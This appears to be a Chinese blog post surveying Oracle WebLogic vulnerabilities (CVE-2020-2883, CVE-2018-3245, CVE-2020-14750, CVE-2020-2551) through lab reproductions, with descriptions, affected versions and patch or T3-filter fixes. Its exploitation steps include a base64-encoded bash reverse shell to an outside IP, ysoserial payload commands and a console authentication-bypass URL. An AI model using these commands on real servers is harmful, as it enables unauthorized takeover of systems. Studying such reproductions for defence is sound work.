所有文章,仅供安全研究与学习之用,后果自负!
weblogic
- 一、weblogic 反序列化(CVE-2020-2883)
- 二、weblogic 远程代码执行 (CVE-2018-3245)
- 三、WebLogic权限绕过漏洞(CVE-2020-14750)
- 四、weblogic IIOP 反序列化 (CVE-2020-2551)
- weblogic 反序列化(CVE-2020-2883)复现
- weblogic 远程代码执行 (CVE-2020-14882)
- weblogic 远程代码执行 (CVE-2019-2725)
- weblogic 反序列化 (CVE-2019-2729)复现
- weblogic 反序列化 (CVE-2018-2628)漏洞复现
- weblogic 远程代码执行 (CVE-2018-3245)
- Weblogic 远程代码执行 (CVE-2018-2893)复现
- weblogic wls-wsat组件远程命令执行(CVE-2017-3506)
- weblogic 反序列化(CVE-2017-10271)
# 前言 Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。
存在漏洞
CVE-2019-2725
CVE-2019-2729
CVE-2018-3191
CVE-2018-2628
CVE-2018-2893
CVE-2018-2894
CVE-2017-3506
CVE-2017-10271
CVE-2017-3248
CVE-2016-0638
CVE-2016-3510
CVE-2015-4852
CVE-2014-4210
SSRF控制台弱⼝令,部署webshell
CVE-2019-2729 出现频率高
一、weblogic 反序列化(CVE-2020-2883)
0x01 漏洞描述
在Oracle官方发布的2020年4月关键补丁更新公告CPU(Critical Patch Update)中,两个针对 WebLogic Server ,CVSS 3.0评分为 9.8的严重漏洞(CVE-2020-2883、CVE-2020-2884),允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。
0x02 影响范围
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
0x03 漏洞利用
7001端口
(1)访问/console目录
Ip:port/console
自动跳转到
http://118.193.36.37:50128/console/login/LoginForm.jsp
确认weblogic靶机成功
(2)反弹shell
攻击机监听
nc -lvvp port 端口
使用脚本反弹shell
反弹shell需要编码,通过网站
shell编码
python3执行
python cve_2020_2883_exp.py -u http://118.193.36.37:50128/ -c "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuMjkuNjcuNC85ODk3IDA+JjE=}|{base64,-d}|{bash,-i}"
反弹shell成功
查看 flag
0x04 漏洞修复
1、官方修复方案
Oracle已经发布补丁修复了上述漏洞,请用户参考官方通告及时下载受影响产品更新补丁,并参照补丁安装包中的readme文件进行安装更新,以保证长期有效的防护。
注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。
2、临时解决方案
用户可通过控制T3协议的访问来临时阻断针对这些漏洞的攻击。操作方法如下:
进入WebLogic控制台,在base_domain的配置页面中,进入“安全”选项卡页面,点击“筛选器”,进入连接筛选器配置。
在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,参考以下写法,在连接筛选器规则中配置符合企业实际情况的规则:
127.0.0.1 * * allow t3 t3s
本机IP * * allow t3 t3s
允许访问的IP * * allow t3 t3s
* * * deny t3 t3s
保存后若规则未生效,建议重新启动WebLogic服务(重启WebLogic服务会导致业务中断,建议相关人员评估风险后,再进行操作)。
二、weblogic 远程代码执行 (CVE-2018-3245)
0x01 漏洞描述
描述: WebLogic是美国Oracle公司出品的一个应用服务器,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。该漏洞通过利用RMI机制的缺陷达到执行任意反序列化代码的目的。攻击者可以在未授权的情况下将payload封装在T3协议中,通过对T3协议中的payload进行反序列化,从而实现对存在漏洞的WebLogic组件进行远程攻击,执行任意代码并可获取目标系统的所有权限.
在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。
0x02 影响范围
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.3
0x03 漏洞利用
https://github.com/ianxtianxt/CVE-2018-3245
Step 1
java -jar ysoserial-cve-2018-3245.jar
WHY SO SERIAL?
Usage: java -jar ysoserial-cve-2018-3245.jar [payload] ‘[command]’
Available payload types:
Payload Authors Dependencies
------- ------- ------------
CVE_2018_2893_1 @mbechler
CVE_2018_2893_2 @mbechler
CVE_2018_2893_3 @mbechler
CVE_2018_3245 @mbechler
JRMPClient @mbechler
Jdk7u21 @frohoff
Step 2
java -jar ysoserial-cve-2018-3245.jar CVE_2018_3245 “[RMI_SERVICE_IP]:[PORT]” > poc5.ser
Step 3
python weblogic.py [TARGET_HOST] [PORT] poc5.
0x04 漏洞修复
4.1 官方升级
Oracle官方已经在本次的关键补丁更新(CPU)中修复了该漏洞,请用户参考官方通告https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW,或绿盟科技安全预警微信公众号文章《Oracle全系产品2018年10月关键补丁更新(CPU)》附录部分,及时下载受影响产品更新补丁,并参照补丁安装包中的readme文件进行安装更新,以保证长期有效的防护。
注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。
4.2 其他解决方案
由于Weblogic采用黑名单的方式阻止恶意反序列化,此次发布的补丁仍存在被绕过的可能,最新版本的jdk引入了JEP290增强安全机制,防护因java反序列化所造成的任意代码执行,使用weblogic的用户可通过升级jdk至最新版本对此漏洞进行防护。
jdk版本升级建议:
jdk1.8版本升级至8u121以上
jdk1.7版本升级至7u131以上
jdk1.6版本升级至6u141以上
三、WebLogic权限绕过漏洞(CVE-2020-14750)
0x01 漏洞描述
Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。
Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞,该漏洞是CVE-2020-14882 补丁的绕过,远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,从而执行任意代码。
CVE-2020-14750 为 WebLogic Console 权限认证绕过的漏洞 CVE-2020-14882 补丁的绕过漏洞,CVSS 评分 9.8 分。CVE-2020-14882 补丁被绕过后,攻击者就可以再度绕过 Console 控制台的权限校验,访问原本需要登录才可以访问的资源和接口功能。尽管 CVE-2020-14883 这个后台的任意代码执行漏洞已被修复,但攻击者依然可以通过寻找利用其他合适的后台接口,从而达到在目标服务端执行任意恶意代码、获取系统权限的目的。
0x02 影响范围
Oracle:Weblogic :
10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
0x03 漏洞利用
①观察正常成功登陆的页面URL(默认账号密码weblogic/weblogic)
http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1
②构造URL绕过登陆
http://127.0.0.1:7001/console/images/%252E./console.portal
这里的%252E是 . 二次url编码的结果
成功绕过登陆:
0x04 漏洞修复
下载官方补丁进行修复
四、weblogic IIOP 反序列化 (CVE-2020-2551)
0x01 漏洞描述
IIOP:IIOP 是 CORBA 的通信协议。它定义通过 CORBA 客户端与服务器之间的连线发送位的方式。
描述: Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 该漏洞原理上类似于RMI反序列化漏洞(CVE-2017-3241),和之前的T3协议所引发的一系列反序列化漏洞也很相似,都是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,并没有进行安全检查所导致的。
Weblogic IIOP反序列化漏洞影响的协议为IIOP协议,该漏洞是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,在使用之前未经安全检查,攻击者可以通过 IIOP 协议远程访问 Weblogic Server 服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。
0x02 影响范围
10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
0x03 漏洞利用
0x04 漏洞修复
weblogic 反序列化(CVE-2020-2883)复现
https://blog.csdn.net/YouthBelief/article/details/121133195
weblogic 远程代码执行 (CVE-2020-14882)
https://blog.csdn.net/YouthBelief/article/details/121132932
weblogic 远程代码执行 (CVE-2019-2725)
https://blog.csdn.net/YouthBelief/article/details/121119954
weblogic 反序列化 (CVE-2019-2729)复现
https://blog.csdn.net/YouthBelief/article/details/121115028
weblogic 反序列化 (CVE-2018-2628)漏洞复现
https://blog.csdn.net/YouthBelief/article/details/121091060
weblogic 远程代码执行 (CVE-2018-3245)
https://blog.csdn.net/YouthBelief/article/details/121102189
Weblogic 远程代码执行 (CVE-2018-2893)复现
https://blog.csdn.net/YouthBelief/article/details/121096673
weblogic wls-wsat组件远程命令执行(CVE-2017-3506)
https://blog.csdn.net/YouthBelief/article/details/121090668
weblogic 反序列化(CVE-2017-10271)
https://blog.csdn.net/YouthBelief/article/details/121088780
547
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
